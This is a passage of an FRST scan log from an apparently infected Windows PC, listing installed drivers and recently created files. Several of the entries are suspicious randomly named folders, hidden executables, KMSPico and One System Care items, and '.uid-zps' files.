R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [31000 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 Qcamain10x64; C:\WINDOWS\system32\DRIVERS\Qcamain10x64.sys [2412976 2017-04-24] (Qualcomm Atheros -> Qualcomm Atheros, Inc.)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [25368 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [954368 2017-04-11] (Realtek Semiconductor Corp. -> Realtek )
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [782304 2017-04-11] (Realtek Semiconductor Corp. -> Realsil Semiconductor Corporation)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 SRTSP; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SRTSP64.SYS [864776 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R1 SRTSPX; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SRTSPX64.SYS [49672 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 STTub30; C:\WINDOWS\System32\Drivers\STTub30.sys [44184 2012-07-20] (STMicroelectronics -> STMicroelectronics)
R0 SymEFASI; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SYMEFASI64.SYS [1998552 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S0 SymELAM; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\SymELAM.sys [25744 2019-05-25] (Microsoft Windows Early Launch Anti-malware Publisher -> Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100064 2019-04-01] (Symantec Corporation -> Symantec Corporation)
R1 SymIRON; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\Ironx64.SYS [315912 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R1 SymNetS; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\symnets.sys [573448 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R3 vjoy; C:\WINDOWS\System32\drivers\vjoy.sys [57976 2017-03-09] (Shaul Eizikovich -> Shaul Eizikovich)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44616 2018-04-12] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [331680 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [44032 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
S3 wpCtrlDrv_NGC; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\wpCtrlDrv.sys [1012120 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S4 SymEvnt; \??\C:\Program Files\Norton Security\NortonData\22.9.2.3\SymPlatform\SymEvnt.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Three months (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-06-11 11:21 - 2019-06-11 11:18 - 000010940 _____ C:\Users\TATTOO NR\Desktop\Fixlog.txt
2019-06-11 11:11 - 2019-06-11 11:18 - 000010940 _____ C:\Users\TATTOO NR\Downloads\Fixlog.txt
2019-06-11 11:11 - 2019-06-11 11:11 - 000000000 ____D C:\Users\TATTOO NR\Downloads\FRST-OlderVersion
2019-06-11 10:53 - 2019-06-11 10:53 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\f3lfxrjhn5p
2019-06-11 10:53 - 2019-06-11 10:53 - 000000000 ____D C:\Program Files\2O7KWFY5NN
2019-06-11 10:33 - 2019-06-11 10:33 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\p0uiw1bfrq3
2019-06-11 10:33 - 2019-06-11 10:33 - 000000000 ____D C:\Program Files\CZR35WZAYJ
2019-06-11 10:13 - 2019-06-11 10:13 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\fmh2w1v003l
2019-06-11 10:13 - 2019-06-11 10:13 - 000000000 ____D C:\Program Files\GQKYY7DDKJ
2019-06-11 09:53 - 2019-06-11 09:53 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\egl2ibdybza
2019-06-11 09:53 - 2019-06-11 09:53 - 000000000 ____D C:\Program Files\KG0G00I0LP
2019-06-11 09:33 - 2019-06-11 09:33 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\ybsdzcmsbo4
2019-06-11 09:33 - 2019-06-11 09:33 - 000000000 ____D C:\Program Files\MHWBGQ5L61
2019-06-11 09:22 - 2019-06-11 11:15 - 000000316 _____ C:\WINDOWS\Tasks\One System CarePeriod.job
2019-06-11 09:22 - 2019-06-11 09:22 - 000002952 _____ C:\WINDOWS\System32\Tasks\One System CarePeriod
2019-06-11 09:13 - 2019-06-11 09:13 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\fplk3kdmigo
2019-06-11 09:13 - 2019-06-11 09:13 - 000000000 ____D C:\Program Files\E5F7Z22438
2019-06-11 09:08 - 2019-06-11 09:08 - 000003356 _____ C:\WINDOWS\System32\Tasks\wVzoSdTGfzmTXt
2019-06-11 09:08 - 2019-06-11 09:08 - 000003044 _____ C:\WINDOWS\System32\Tasks\vCITHywpmVbAM2
2019-06-11 09:08 - 2019-06-11 09:08 - 000003034 _____ C:\WINDOWS\System32\Tasks\LIUFzeWTazYslRQqD2
2019-06-11 09:08 - 2019-06-11 09:08 - 000003026 _____ C:\WINDOWS\System32\Tasks\sSQkKOKYWDiwSfhyvlN2
2019-06-11 09:08 - 2019-06-11 09:08 - 000003008 _____ C:\WINDOWS\System32\Tasks\iGCYEUMXJwKesSj2
2019-06-11 09:08 - 2019-06-11 09:08 - 000000000 ____D C:\ProgramData\bzughXCIBIxiSQVB
2019-06-11 09:08 - 2019-06-11 09:08 - 000000000 ____D C:\Program Files (x86)\QWszBGwJaeOCwsfDwHR
2019-06-11 09:08 - 2019-06-11 09:08 - 000000000 ____D C:\Program Files (x86)\qiVwSvhOvTUn
2019-06-11 09:08 - 2019-06-11 09:08 - 000000000 ____D C:\Program Files (x86)\OSBCtizBNrsU2
2019-06-11 09:08 - 2019-06-11 09:08 - 000000000 ____D C:\Program Files (x86)\lWHHxbcKHnQsC
2019-06-11 09:07 - 2019-06-11 09:08 - 000000000 ____D C:\Program Files (x86)\cqyivUztEIE
2019-06-11 09:04 - 2019-06-11 09:09 - 000000000 ____D C:\Users\TATTOO NR\Desktop\ZALOHA
2019-06-11 09:04 - 2019-06-11 09:04 - 000000000 ____D C:\Program Files (x86)\ucUYDxMaU
2019-06-11 08:58 - 2019-06-11 08:58 - 000000264 _____ C:\Users\TATTOO NR\AppData\Roaming\IBDT5U31NO6.txt
2019-06-11 08:57 - 2019-06-11 10:16 - 000003464 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2019-06-11 08:57 - 2019-06-11 10:16 - 000003456 _____ C:\WINDOWS\System32\Tasks\One System Care Delayed
2019-06-11 08:55 - 2019-06-11 10:15 - 000001136 _____ C:\Users\TATTOO NR\Desktop\Launch One System Care.lnk
2019-06-11 08:55 - 2019-06-11 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2019-06-11 08:55 - 2019-06-11 10:15 - 000000000 ____D C:\Program Files (x86)\OneSystemCare
2019-06-11 08:55 - 2019-06-11 09:22 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\One System Care
2019-06-11 08:53 - 2019-06-11 08:53 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\cenu3qfhh2i
2019-06-11 08:53 - 2019-06-11 08:53 - 000000000 ____D C:\Program Files\X7PXPV31L9
2019-06-10 18:51 - 2019-06-11 11:22 - 000000000 _RSHD C:\ProgramData\AMDControlPanelClient
2019-06-10 18:51 - 2019-06-11 11:22 - 000000000 ____D C:\ProgramData\IntelCore
2019-06-10 18:51 - 2019-06-11 11:20 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\Z60054574
2019-06-10 18:51 - 2019-06-11 09:49 - 000206848 _____ C:\Users\TATTOO NR\AppData\Roaming\cookies.sqlite
2019-06-10 18:51 - 2019-06-10 18:51 - 000000000 _RSHD C:\ProgramData\WindowsTools
2019-06-10 18:51 - 2019-06-10 18:51 - 000000000 _RSHD C:\ProgramData\AMDTools
2019-06-10 18:51 - 2019-06-10 18:51 - 000000000 __SHD C:\Users\TATTOO NR\AppData\Roaming\Media
2019-06-10 18:51 - 2019-06-10 18:51 - 000000000 ____D C:\WINDOWS\System32\Tasks\TASKDIRFORTASKCREATE
2019-06-10 18:51 - 2019-06-10 18:51 - 000000000 ____D C:\WINDOWS\System32\Tasks\System
2019-06-10 18:50 - 2019-06-10 18:51 - 018802000 ____H C:\Users\TATTOO NR\AppData\Local\protect.exe
2019-06-10 18:50 - 2019-06-10 18:51 - 000692544 ____H (tortoi sfgdfeaf) C:\Users\TATTOO NR\AppData\Local\test.exe
2019-06-10 18:50 - 2019-06-10 18:51 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\SysDriver
2019-06-10 18:50 - 2019-06-10 18:50 - 000633344 ____H () C:\Users\TATTOO NR\AppData\Local\XHeate3r.exe
2019-06-10 18:50 - 2019-06-10 18:50 - 000006144 ____H (Activate WIndows) C:\Users\TATTOO NR\AppData\Local\boratfilms.exe
2019-06-10 18:50 - 2019-06-10 18:50 - 000000000 ____D C:\WINDOWS\System32\Tasks\Microsоft
2019-06-10 17:16 - 2019-06-10 17:16 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc
2019-06-10 17:03 - 2019-06-10 17:03 - 007025360 _____ (Malwarebytes) C:\Users\TATTOO NR\Downloads\AdwCleaner.exe
2019-06-10 16:56 - 2019-06-10 18:00 - 000027999 _____ C:\Users\TATTOO NR\Downloads\Addition2.zip
2019-06-10 16:36 - 2019-06-10 17:59 - 000142008 _____ C:\Users\TATTOO NR\Downloads\Addition.txt
2019-06-10 16:33 - 2019-06-11 11:25 - 000041613 _____ C:\Users\TATTOO NR\Downloads\FRST.txt
2019-06-10 16:33 - 2019-06-11 11:11 - 002418688 _____ (Farbar) C:\Users\TATTOO NR\Downloads\FRST64.exe
2019-06-10 16:02 - 2019-06-11 11:21 - 000000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2019-06-10 15:48 - 2019-06-11 11:17 - 000000008 __RSH C:\Users\TATTOO NR\ntuser.pol
2019-06-10 15:48 - 2019-06-10 15:48 - 000003376 _____ C:\WINDOWS\System32\Tasks\Norton WSC Integration
2019-06-10 15:48 - 2019-06-10 15:48 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2019-06-10 15:31 - 2019-06-10 15:31 - 000002878 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2019-06-10 15:28 - 2019-06-11 11:13 - 000003390 _____ C:\WINDOWS\System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0}
2019-06-10 15:27 - 2019-06-10 15:27 - 000000000 ____D C:\ProgramData\Pader
2019-06-10 15:25 - 2019-06-11 11:19 - 000000258 __RSH C:\ProgramData\ntuser.pol
2019-06-10 15:24 - 2019-06-11 11:12 - 000000000 ___HD C:\WINDOWS\rss
2019-06-10 15:24 - 2019-06-11 11:12 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\App
2019-06-10 15:24 - 2019-06-10 15:24 - 000000000 ____D C:\Users\TATTOO NR\AppData\Local\AdvinstAnalytics
2019-06-10 15:23 - 2019-06-10 15:23 - 000000000 ____D C:\Program Files (x86)\KMSPico
2019-06-10 15:17 - 2019-06-10 15:51 - 000000000 ____D C:\Users\TATTOO NR\AppData\LocalLow\uTorrent
2019-06-10 15:17 - 2019-06-10 15:17 - 000004608 _____ C:\WINDOWS\SECOH-QAD.exe
2019-06-10 15:17 - 2019-06-10 15:17 - 000003584 _____ C:\WINDOWS\SECOH-QAD.dll
2019-06-10 15:04 - 2019-06-10 15:04 - 000162537 _____ C:\Users\TATTOO NR\Downloads\kupna zmluva auto.pdf
2019-06-10 14:52 - 2019-06-10 14:52 - 000756914 _____ C:\Users\TATTOO NR\AppData\Roaming\fdfbvd.exe
2019-06-10 09:42 - 2019-06-10 09:42 - 000000000 ____D C:\WINDOWS\System32\Tasks\Remediation
2019-06-10 09:40 - 2019-06-10 09:40 - 000002497 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002496 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002460 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002459 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002453 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002447 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000002439 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2019-06-10 09:40 - 2019-06-10 09:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
2019-06-10 09:34 - 2019-06-10 09:34 - 000000110 ____H C:\Users\TATTOO NR\Desktop\depositphotos_221770690-stock-photo-rose-window-neo-gothic-style.jpg.uid-zps
2019-06-07 10:20 - 2019-06-07 10:20 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez cfecgw.png.uid-zps
2019-06-06 12:33 - 2019-06-06 12:33 - 000000110 ____H C:\Users\TATTOO NR\Desktop\stiahnuť.jpgjfrtj.jpg.uid-zps
2019-06-04 14:59 - 2019-06-04 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\59839268_347941759413581_5544069203016810496_n.jpg.uid-zps
2019-06-04 09:01 - 2019-06-04 09:01 - 000000110 ____H C:\Users\TATTOO NR\Desktop\9f42c06c793e3e8a98f330f1ef9fcd76.jpg.uid-zps
2019-06-03 09:07 - 2019-06-03 09:07 - 000000110 ____H C:\Users\TATTOO NR\Desktop\beautiful-bloom-blooming-658687 (1).jpg.uid-zps
2019-06-03 09:03 - 2019-06-03 09:03 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Natural-Rose.jpg.uid-zps
2019-05-31 09:11 - 2019-05-31 09:11 - 000000110 ____H C:\Users\TATTOO NR\Desktop\SRAM_EX1_UH.jpg.uid-zps
2019-05-30 16:26 - 2019-05-30 16:26 - 000000110 ____H C:\Users\TATTOO NR\Desktop\61543348_682086725557581_6099366821796773888_n.jpg.uid-zps
2019-05-30 09:06 - 2019-05-30 09:06 - 000000110 ____H C:\Users\TATTOO NR\Desktop\ffff.jpg.uid-zps
2019-05-27 09:14 - 2019-05-27 09:14 - 000000110 ____H C:\Users\TATTOO NR\Desktop\1_NPl8IDrkOHaILlhr7lLI5Q@2x.jpeg.uid-zps
2019-05-24 09:37 - 2019-05-24 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Chester-Bennington-Drawing.jpg.uid-zps
2019-05-24 09:37 - 2019-05-24 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\19212-chester-bennington-screaming-hd-wallpaper.jpg.uid-zps
2019-05-23 09:52 - 2019-05-23 09:52 - 000000110 ____H C:\Users\TATTOO NR\Desktop\48368327_211082393154894_908574033384046592_n.jpg.uid-zps
2019-05-21 14:59 - 2019-05-21 14:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\60158295_706204403153531_1740009122692071424_n.jpg.uid-zps
2019-05-20 09:35 - 2019-05-20 09:35 - 000000110 ____H C:\Users\TATTOO NR\Desktop\opravena ospravdlk – kópia.jpg.uid-zps
2019-05-15 10:05 - 2019-05-03 08:31 - 007519888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-05-15 10:05 - 2019-05-03 08:18 - 006569344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-05-15 10:05 - 2019-05-03 08:12 - 025855488 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-05-15 10:04 - 2019-05-03 14:14 - 000790208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2019-05-15 10:04 - 2019-05-03 14:13 - 001376472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-05-15 10:04 - 2019-05-03 14:13 - 000396088 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2019-05-15 10:04 - 2019-05-03 13:55 - 000123392 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2019-05-15 10:04 - 2019-05-03 13:54 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2019-05-15 10:04 - 2019-05-03 13:52 - 000119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2019-05-15 10:04 - 2019-05-03 13:51 - 003613696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2019-05-15 10:04 - 2019-05-03 13:51 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-05-15 10:04 - 2019-05-03 13:50 - 004054528 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-05-15 10:04 - 2019-05-03 13:50 - 001663488 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 001288704 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 000488448 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2019-05-15 10:04 - 2019-05-03 13:49 - 000210944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2019-05-15 10:04 - 2019-05-03 13:43 - 001027008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-05-15 10:04 - 2019-05-03 13:43 - 000662328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2019-05-15 10:04 - 2019-05-03 13:30 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2019-05-15 10:04 - 2019-05-03 13:30 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2019-05-15 10:04 - 2019-05-03 13:28 - 002882048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2019-05-15 10:04 - 2019-05-03 13:28 - 000089600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2019-05-15 10:04 - 2019-05-03 13:27 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2019-05-15 10:04 - 2019-05-03 13:26 - 000425472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2019-05-15 10:04 - 2019-05-03 13:25 - 004055040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-05-15 10:04 - 2019-05-03 13:25 - 001471488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-05-15 10:04 - 2019-05-03 08:43 - 000177128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2019-05-15 10:04 - 2019-05-03 08:36 - 001035256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-05-15 10:04 - 2019-05-03 08:34 - 000159864 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 005625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2019-05-15 10:04 - 2019-05-03 08:33 - 001219896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 001027384 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 000709720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2019-05-15 10:04 - 2019-05-03 08:33 - 000568104 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2019-05-15 10:04 - 2019-05-03 08:33 - 000134968 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2019-05-15 10:04 - 2019-05-03 08:33 - 000076088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2019-05-15 10:04 - 2019-05-03 08:33 - 000063072 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000793640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2019-05-15 10:04 - 2019-05-03 08:32 - 000776784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000493880 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2019-05-15 10:04 - 2019-05-03 08:32 - 000438984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2019-05-15 10:04 - 2019-05-03 08:32 - 000209208 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2019-05-15 10:04 - 2019-05-03 08:32 - 000170296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2019-05-15 10:04 - 2019-05-03 08:32 - 000164664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wfplwfs.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 009084432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 007436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 002811192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 002771256 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 001459328 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-05-15 10:04 - 2019-05-03 08:31 - 001260480 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 001141224 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2019-05-15 10:04 - 2019-05-03 08:31 - 001098064 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 000983632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2019-05-15 10:04 - 2019-05-03 08:31 - 000545808 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2019-05-15 10:04 - 2019-05-03 08:31 - 000412984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2019-05-15 10:04 - 2019-05-03 08:31 - 000115728 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdnet.dll
2019-05-15 10:04 - 2019-05-03 08:20 - 000434704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2019-05-15 10:04 - 2019-05-03 08:20 - 000384976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2019-05-15 10:04 - 2019-05-03 08:20 - 000192016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2019-05-15 10:04 - 2019-05-03 08:20 - 000146920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2019-05-15 10:04 - 2019-05-03 08:19 - 006043712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2019-05-15 10:04 - 2019-05-03 08:19 - 000665224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2019-05-15 10:04 - 2019-05-03 08:19 - 000056288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll
2019-05-15 10:04 - 2019-05-03 08:18 - 002258640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-05-15 10:04 - 2019-05-03 08:18 - 001130568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2019-05-15 10:04 - 2019-05-03 08:10 - 022017024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-05-15 10:04 - 2019-05-03 08:05 - 022716416 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-05-15 10:04 - 2019-05-03 08:02 - 019401216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-05-15 10:04 - 2019-05-03 08:02 - 004866048 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2019-05-15 10:04 - 2019-05-03 08:01 - 008189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 006661632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 003400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 000120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-kernel-processor-power-events.dll
2019-05-15 10:04 - 2019-05-03 08:00 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 007593472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 005788672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 003710976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000514560 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2019-05-15 10:04 - 2019-05-03 07:59 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXApplicabilityBlob.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2019-05-15 10:04 - 2019-05-03 07:59 - 000154112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 002175488 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 001708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSPhotography.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 001361408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSPhotography.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000894464 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2019-05-15 10:04 - 2019-05-03 07:58 - 000462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2019-05-15 10:04 - 2019-05-03 07:58 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2019-05-15 10:04 - 2019-05-03 07:57 - 001826816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001560576 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001549824 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 001295872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000808448 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000608768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-05-15 10:04 - 2019-05-03 07:57 - 000561152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 005350912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 001803776 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-05-15 10:04 - 2019-05-03 07:56 - 000773632 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
